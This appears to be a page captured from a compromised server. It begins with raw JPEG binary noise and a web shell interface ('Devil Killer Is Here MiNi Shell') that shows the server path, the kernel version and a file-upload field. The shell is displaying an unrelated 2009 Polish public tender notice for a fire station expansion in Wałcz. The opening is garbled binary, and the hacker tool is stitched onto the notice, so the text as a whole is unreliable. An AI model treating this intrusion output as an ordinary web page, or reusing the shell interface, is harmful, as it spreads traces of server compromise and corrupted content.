JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090429/127702-N-2009.html

<p class="kh_header"><b>Wałcz: Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap III</b><br>
<b>Numer ogłoszenia: 127702 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu , ul. 12 Lutego 20, 78-600 Wałcz, woj. zachodniopomorskie, tel. 067 2589471, faks 067 2589471.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazwalcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest ,,Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap III (CPV- 45216120-1 Roboty budowlane w zakresie budowy obiektów budowlanych dla służb ratunkowych,  45216121-8 Obiekty Straży Pożarnej).
2.	Zakres robót etapu III opisany jest zgodnie z określeniami i podziałem wynikającym z dokumentacji projektowej i obejmuje:

1/	Budowę budynku B (CPV-4520000-9) obejmującą kompletne wykonanie budynku garażowo-warsztatowego, parterowego, niepodpiwniczonego z uwzględnieniem wykonania posadzki z płytek klinkierowych (ceramicznych) 25mm układanych na mokro metodą wibracyjną we wszystkich pomieszczeniach budynku poza pomieszczeniem WC;

2/	Budowę kompletnego zewnętrznego najazdowego kanału naprawczego;

3/	Budowę i uruchomienie stanowiska dystrybucji paliw ze zbiornikiem dwukomorowym oraz wiatą nad stanowiskiem dystrybucji i elementami małej architektury (barierki parkingowe szt.7 - projekt zagospodarowania terenu). Wykonawca uwzględni zmiany w dokumentacji projektowej technologii stanowiska dystrybucji paliw obejmujące: 
a/	Usytuowanie w pomieszczeniu 117 (kwatermistrz) I piętro, budynek A systemu ciągłego monitoringu stanowiska dystrybucji paliw i urządzeń kontrolno pomiarowych wraz z wykonaniem przyłączenia do okablowania ułożonego przez Wykonawcę  II etapu robót;
b/	Wykonanie włącznika zasilania dystrybutora w zamykanej obudowie zamontowanej na panelu manipulacyjnym przy dystrybutorze.

4/	Wykonanie z kostki betonowej brukowej nawierzchni placów i parkingów w zakresie:
a)	Nawierzchni parkingów, placu i chodników przed budynkiem A oraz bramą wjazdową na plac wewnętrzny. Stanowiska parkingowe wydzielić kostką koloru czerwonego.
b)	Nawierzchni parkingów, placu i chodników za bramą wjazdową (wewnętrzny plac manewrowy). Stanowiska parkingowe i miejsce zmiany służby wydzielić kostką koloru czerwonego.
c)	Nawierzchni szczelnej placu przy stanowisku dystrybucji paliw wraz z powierzchnią 15m2  w miejscu wyłączonego z budowy budynku C (magazynu MPiS).
d)	Nawierzchni placu przy zewnętrznym kanale najazdowym.

5/	Zagospodarowanie terenu w zakresie:
a)	Budowy osłony śmietnika;
b)	Wykonania ogrodzenia typowego na całej długości granicy działki od strony północno wschodniej;
c)	Wykonanie ogrodzenia indywidualnego wraz z bramą wjazdową i furtką wejściową na wewnętrzny plac manewrowy. Sterowanie otwieraniem i zamykaniem bramy wjazdowej elektryczne na pilota oraz z pulpitu sterowniczego dyspozytora PSK. Sterowanie otwieraniem i zamykaniem furtki wejściowej na wewnętrzny plac manewrowy z zamkiem mechaniczno - elektrycznym wyposażonym w czytnik dostępowych kart magnetycznych przewidzianych dla co najmniej 50 osób. Moduły sterowniczo zabezpieczające bramy i furtki na wewnętrzny plac manewrowy wykonać z uwzględnieniem następujących elementów:
1)	doprowadzenia kabla energetycznego do zasilania elektrycznego;
2)	doprowadzenia kabla sterującego urządzeniami specjalistycznymi;  
3)	wyposażenia bramy w mechanizmy przesuwne i elementy sterownicze;
4)	wyposażenia furtki w mechanizmy zabezpieczające i dedykowane urządzenia dostępowe; 
d)	Wykonanie z cegły klinkierowej murków wydzielających funkcje poszczególnych powierzchni zagospodarowania terenu.

6/	Wykonanie kompletnej wewnętrznej instalacji wodno-kanalizacyjnej w budynku B 
7/	Wykonanie kompletnej instalacji na sprężone powietrze w budynku B wraz z jej przyłączeniem do instalacji w budynku A;
8/	Wykonanie kompletnych instalacji  grzewczych w budynku B wraz z przyłączeniem do instalacji zasilającej w budynku A. Zamawiający dostarczy grzejniki z zaworami odcinającymi i regulatorami termostatycznymi do pomieszczeń Nr 1, 2, 4, 5, 7 i pomieszczenia WC według zestawienia w podrozdziale XIX pkt.3.
9/	Wykonanie kompletnej wentylacji mechanicznej i odsysania spalin z rur wydechowych garażowanych pojazdów w budynku B;
10/	Wykonanie zewnętrznych instalacji wod-kan (CPV- 45330000-9) obejmujących następujące roboty budowlano - instalacyjne:
a)	Wykonanie zewnętrznej instalacji kanalizacji deszczowej w odcinkach:
-	od D3 do D21 wraz z wykonaniem kompletnych odprowadzeń wody z połaci dachowej budynku B;
-	od D5 do D9 wraz z wykonaniem odwodnienia liniowego przy wyjeździe z placu manewrowego przed budynkiem A i pomiędzy budynkami A i B;
-	od D11 do D15 i od D14 do D24, D25, D26, D27 wraz z wykonaniem odwodnienia liniowego placu w obrębie stanowiska dystrybucji paliw;
-	od D10 do D17 wraz z wykonaniem odwodnienia liniowego placu manewrowego,
-	od D14 do Rd5 z zakończeniem umożliwiającym późniejsze przyłączenie pionów instalacyjnych odprowadzenia wody z połaci dachowej budynku C;
b)	Wykonanie zewnętrznej instalacji kanalizacji technologicznej w odcinkach:
-	od S5 do S12,
-	od S6 do S13,
-	od S6 do S10,
-	od S7 do S14,
c)	Wykonanie zewnętrznej instalacji kanalizacji sanitarnej od S15 do S20;
d)	Wykonanie zewnętrznej sieci instalacji wodnej w odcinkach:
-	od W6 do W15 z przyłączeniem do instalacji wewnętrznej w budynku B,
-	od W10 do W 12 zakończonej wykonaniem hydrantu podziemnego;
e)	Przeniesienie hydrantu nadziemnego zgodnie z dokumentacją projektową z istniejącego punktu HP do nowej lokalizacji w punkcie HP1.
11/	Wykonanie instalacji specjalistycznych wewnętrznych i zewnętrznych (CPV - 45300000-0) w zakresie budynku B z przyłączeniem do paneli sterujących umiejscowionych w pomieszczeniu powiatowego stanowiska kierowania w budynku A.
Zakres wykonania instalacji specjalistycznych obejmuje:
a)	Moduł sygnalizacji optycznej i akustycznej o zdarzeniach;
b)	Moduł sterowania urządzeniami w zakresie automatycznego sterowania bramami garażowymi z uwzględnieniem możliwości zintegrowanego sterowania z dotykowego panelu dyspozytorskiego. 
c)	Moduł telewizji dozorowej;
d)	Moduł kontroli dostępu;
e)	Moduł rozgłoszeniowy;
f)	Moduł sieci komputerowej.

12/	Wyposażyć węzeł teletechniczny w serwerowi, w cyfrowy rejestrator rozmów wraz z konfiguracją i przyłączeniem do systemu łączności radiowej i telefonicznej. Parametry techniczne rejestratora:
1/	Obudowa w  wersji RACK 19
2/	Karty rejestrujące analogowe na dwie linie telefoniczne;
3/	Karty rejestrujące rozmowy łączności radiowej z dziewięciu radiotelefonów;
4/	Karty rejestrujące cyfrowe (ISDN) na pięć linii telefonicznych;
5/	System bezpieczeństwa danych (odrębny dysk fizyczny - HDD);
6/	Cza zapisu danych na minimum 7500 godzin;
7/	Możliwość archiwizacji danych na nośnikach optycznych (DVD);
8/	Monitor i urządzenia peryferyjne do zarządzania systemem rejestratora;
9/	Możliwość rozbudowy rejestratora o sześć dodatkowych kart rejestrujących;
10/	Oprogramowanie umożliwiające rejestrowanie i sieciowe administrowanie systemem;
Wykonawca zobowiązany jest dokonać kalkulacji wykonania robót i wyszczególnionego wyposażenia uwzględniając również niezbędne akcesoria i przewody połączeniowe w oparciu o  koncepcję własną.

13/	Wyposażenie pomieszczenia technicznego z urządzeniami łączności radiowej zlokalizowanego  w budynku WSM na osiedlu Dolne Miasto 15, 78-600 Wałcz w system antywłamaniowy podłączony przewodem do odległego o około 400 m centralnego systemu monitorowania usytuowanego na powiatowym stanowisku kierowania Państwowej Straży Pożarnej w Wałczu przy ul. 12 Lutego 20. Przewód należy przeprowadzić w torze kablowym łączności radiowej po jego wykonaniu przez wykonawcę II etapu robót. W celu przyłączenia urządzeń i instalacji do systemu Wykonawca zobowiązany jest dokonać kalkulacji uwzględniając potrzebny rodzaj i długość przewodów oraz urządzenia systemu w oparciu o  koncepcję własną.

14/	Wyposażenie sali konferencyjnej na pierwszym piętrze budynku A w sprzęt audio-wizualny oraz rolety okienne o parametrach określonych w dokumentacji projektowej. W szafie z urządzeniami integrująco - sterowniczymi wykonać wnękę na umieszczenie standardowej jednostki komputerowej. Wszystkie urządzenia powinny być przystosowane do zdalnej pracy. 

15/	Roboty instalacyjne elektryczne zewnętrzne i wewnętrzne w zakresie budynku B (CPV-45310000-3):
a)	Wykonanie kompletnej instalacji elektrycznej wewnętrznej;
b)	Wykonanie kompletnej instalacji odgromowej i połączeń wyrównawczych;
c)	Wykonanie kompletnej instalacji ładowania akumulatorów w samochodach.
d)	Przyłączenie znajdującego się na wyposażeniu zamawiającego agregatu prądotwórczego GBL30 z pulpitem sterującym AC-02, z miejsca lokalizacji w budynku B do rozdzielnicy rezerwowanej o mocy 30 kVA w budynku A w sposób  umożliwiający automatyczne załączanie  agregatu po zaniku zasilania w energię elektryczną z sieci miejskiej.  Wykonawca uwzględni kompletne okablowanie i urządzenia niezbędne do przyłączenia i automatycznego załączania. 

3.	Realizacja zadania powinna obejmować wszelkie prace i czynności niezbędne do prawidłowego wykonania przedmiotowego zamówienia w zakresie rzeczowym ujętym w opracowaniach:
1/	Dokumentacji projektowej obejmującej projekty budowlano - wykonawcze,
2/	Specyfikacji technicznej wykonania i odbioru robót, stosownie do zakresu rzeczowego zamówienia,
3/	Specyfikacji Istotnych Warunków Zamówienia (SIWZ),
4/	Informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ).

4.	Opracowania opisujące szczegółowo przedmiot zamówienia:
1/	Projekt budowlano-wykonawczy zagospodarowania terenu.
2/	Projekt budowlano-wykonawczy przyłączy wod-kan.
3/	Projekt budowlano-wykonawczy zewnętrznych instalacji wod-kan.
4/	Projekt budowlano-wykonawczy placów, parkingów i boiska.
5/	Projekt budowlano-wykonawczy technologii stanowiska dystrybucji paliw.
6/	Projekt budowlano-wykonawczy architektury - budynek B.
7/	Projekt budowlano-wykonawczy konstrukcji - budynek B.
8/	Projekt budowlano-wykonawczy instalacji c.o. i sprężonego powietrza - budynek B.
9/	Projekt budowlano-wykonawczy instalacji wod-kan - budynek B.
10/	Projekt budowlano-wykonawczy wentylacji mechanicznej, odsysania spalin-budynek B.
11/	Projekt budowlano-wykonawczy instalacji elektrycznej - budynek B.
12/	Projekt budowlano-wykonawczy instalacji specjalistycznych  - budynek B.
13/	Informacja bezpieczeństwa i ochrony zdrowia (BIOZ).
14/	Specyfikacja techniczna wykonania i odbioru robót budowlanych - zagospodarowania terenu, budynku A, budynku B, budynku C, kanału zewnętrznego, wiaty nad dystrybutorem, fundamentu pod zbiornik na paliwa, rozbiórek budynków.
15/	Specyfikacja techniczna wykonania i odbioru robót sanitarnych - zewnętrznych: przyłącze wodociągowe, gazowe, cieplne, sieci sanitarne, deszczowe, sprężonego powietrza.
16/	Specyfikacja techniczna wykonania i odbioru robót instalacji sanitarnych wewnętrznych:  budynek A, budynek B.
17/	Specyfikacja techniczna wykonania i odbioru robót. Instalacje elektryczne wewnętrzne, zewnętrzne, linie kablowe i oświetlenie zewnętrzne.
18/	Specyfikacja techniczna wykonania i odbioru robót elektrycznych zewnętrznych i wewnętrznych - instalacje specjalistyczne zewnętrzne, kanalizacja teletechniczna radiowa, uliczna sygnalizacja świetlna z organizacją ruchu. Instalacje wewnętrzne - budynek A, B, C.

Specyfikacje techniczne wykonania i odbioru robót budowlanych należy uwzględnić odpowiednio do zakresu robót.
Wykonanie robót nie uwzględnionych w dokumentacji projektowej, a niezbędnych w celu zrealizowania zamówienia opisanego w specyfikacji istotnych warunków zamówienia wykonawca oszacuje i wykona według własnej kalkulacji i koncepcji w uzgodnieniu z Zamawiającym.


5.	Dokumentacja pomocnicza:
1/	Przedmiar robót budowlanych - budynek B
2/	Przedmiar robót-instalacje c.o. i sprężonego powietrza - budynek B
3/	Przedmiar robót - wentylacji mechanicznej, klimatyzacji i odsysania spalin -budynek B
4/	Przedmiar robót instalacji elektrycznej w budynku B.
5/	Przedmiar robót instalacji specjalistycznych w budynku B
6/	Przedmiar robót osłony śmietnika i ogrodzenia indywidualnego.
7/	Przedmiar robót wewnętrznej instalacji wod-kan - budynek B.
8/	Przedmiar robót zewnętrznej instalacji wodnej.
9/	Przedmiar robót zewnętrzny kanał naprawczy z najazdem
10/	 Przedmiar robót - ogrodzenie typowe.
11/	 Przedmiar robót zewnętrznej instalacji kanalizacji technologicznej.
12/	 Przedmiar robót zewnętrznej instalacji kanalizacji sanitarnej.
13/	 Przedmiar robót zewnętrznej instalacji kanalizacji deszczowej.
14/	 Przedmiar robót - wiata nad stanowiskiem dystrybucji paliw.
15/	 Przedmiar robót stanowiska dystrybucji paliw.
16/	 Przedmiar robót fundament pod zbiornik paliwa.


6.	Szczegółowe wymagania Zamawiającego dotyczące przedmiotu zamówienia:
1/	Wszystkie wyroby wskazane lub zalecane w projekcie Wykonawca może zastąpić wyrobami zamiennymi pod warunkiem, że są równoważne technicznie, spełniają wymagania norm i przepisów oraz założone parametry projektowe. Na zastosowanie wyrobów zamiennych Wykonawca jest zobowiązany uzyskać zgodę Zamawiającego. W sytuacji, gdy zmiany generowały będą konieczność wykonania przez nadzór autorski aneksu do projektu, koszt wykonania przedmiotowego aneksu pokrywać będzie wnioskujący zmiany.
2/	Wykonanie nawierzchni posadzki z płytek klinkierowych 25mm (ceramicznych) układanych na mokro metodą wibracyjną w pomieszczeniach budynku B w wyłączeniem pomieszczenia WC, w którym nawierzchnię posadzek należy wykonać zgodnie z projektem.
3/	Wykonawca zapewni prowadzenie robót w sposób umożliwiający prawidłowe funkcjonowanie Komendy Powiatowej, a w szczególności funkcjonowania powiatowego stanowiska kierowania.  Czynnik ten należy uwzględnić podczas sporządzania oferty, wyceny prac oraz uzgadniania z Zamawiającym harmonogramu rzeczowo-finansowego i planu realizacji budowy.
4/	Wykonawca w terminie do 21 dni od podpisania umowy przedstawi uzgodnione z Zamawiającym szczegółowe założenia techniczno - wykonawcze instalacji specjalistycznych w budynku B.
5/	Wykonawca opracuje w terminie do 7 dni od podpisania umowy i przedstawi Zamawiającemu szczegółowy harmonogram rzeczowo - finansowy realizacji robót stosownie do  czasokresu prowadzenia robót budowlanych określonych w SIWZ i  umowie.
7.	Wykonawca winien dokonać wizji lokalnej terenu budowy. Termin wizji lokalnej należy ustalić z mł. asp. Mirosławem Gruchot tel. 067 258 94 71 wew.13. Opracowania opisujące przedmiot zamówienia  dostępne są w siedzibie zamawiającego i na stronie internetowej http://www.strazwalcz.pl.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 95 000 zł (słownie: dziewięćdziesiąt pięć tysięcy złotych).
2.	Ustala się termin wniesienia wadium lub wpłynięcia na rachunek bankowy Komendy Powiatowej Państwowej Straży Pożarnej w Wałczu do godziny 1200 w dniu  22 maja 2009 roku.
3.	Wadium może być wniesione: 
1)	w pieniądzu przelewem na rachunek bankowy Komendy Powiatowej Państwowej Straży Pożarnej w Wałczu   Nr  60 1020 2847 00001402 0068 2153
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielonych przez podmioty, o których mowa w art.6b  ust.5 pkt.2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), zdeponowanych w formie oryginału w Komendzie Powiatowej PSP w Wałczu - sekcja ds. finansowych, I piętro, od poniedziałku do piątku w godzinach od 730 do  1530.
4.	Wadium przekazane w formie polecenia przelewu uważa się za zapłacone wtedy, gdy wpłynie na rachunek Zamawiającego do godziny 1200 w dniu  22 maja 2009 roku.
5.	W przypadku złożenia oferty wspólnej wadium w formie innej niż gotówka musi być wystawione na wszystkich partnerów.
6.	Wadium wniesione w poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty o których mowa w art.6b ust. 5 pkt.2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42 poz. 275) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, które zostały określone w art.46  ust.5  ustawy Prawo Zamówień Publicznych.
7.	Z treści wniesionego zabezpieczenia jednoznacznie musi wynikać zobowiązanie gwaranta (banku, zakładu ubezpieczeń, poręczyciela) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaistniały okoliczności o których mowa wyżej, bez jakiejkolwiek potrzeby potwierdzania tych okoliczności.
8.	Termin obowiązywania wniesionego zabezpieczenia nie może być krótszy niż termin związania ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: 
1/	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2/	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wy?konania zamówienia;
3/	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia,
4/	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5/	dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże minimum po jednej osobie posiadającej uprawnienia do kierowania robotami  w specjalności: 
a/	konstrukcyjno-budowlanej,
b/	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
c/	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYMAGANE DOKUMENTY POTWIERDZAJĄCE SPEŁNIANIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU, OPIS WARUNKÓW ORAZ SPOSÓB OCENY ICH SPEŁNIANIA. INNE DOKUMENTY WYMAGANE W OFERCIE.

1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: 
1/	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2/	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wy?konania zamówienia;
3/	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia,
4/	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5/	dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże minimum po jednej osobie posiadającej uprawnienia do kierowania robotami  w specjalności: 
a/	konstrukcyjno-budowlanej,
b/	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
c/	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
6/	Każdy z Wykonawców ma obowiązek złożyć następujące dokumenty i oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu:
a/	Oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1 i art.44  ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ.
b/	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.
7/	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  	
	W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.
8/	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1  pkt.4 - 8  ustawy Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
	W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców składających ofertę wspólną.
9/	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 ustawy Prawo Zamówień Publicznych, wystawioną nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 	
		W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.

UWAGA:
	Przedmiotowa informacja winna być wystawiona na podmiot zbiorowy, którym w myśl art.2 ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz.U. Nr 197, poz.661 z  późn. zm.) są osoby prawne (spółki kapitałowe - spółka akcyjna, spółka z o.o.), jednostki organizacyjne nie mające osobowości prawnej (osobowe spółki handlowe - spółka jawna, partnerska, komandytowa i komandytowo - akcyjna), a także spółki handlowe z udziałem Skarbu Państwa, jednostki samorządu terytorialnego lub związki takich jednostek, spółki kapitałowe w organizacji, podmiot w stanie likwidacji oraz przedsiębiorca nie będący osobą fizyczną, a także zagraniczna jednostka organizacyjna. Spółki cywilne nie są podmiotami w rozumieniu ww. ustawy.

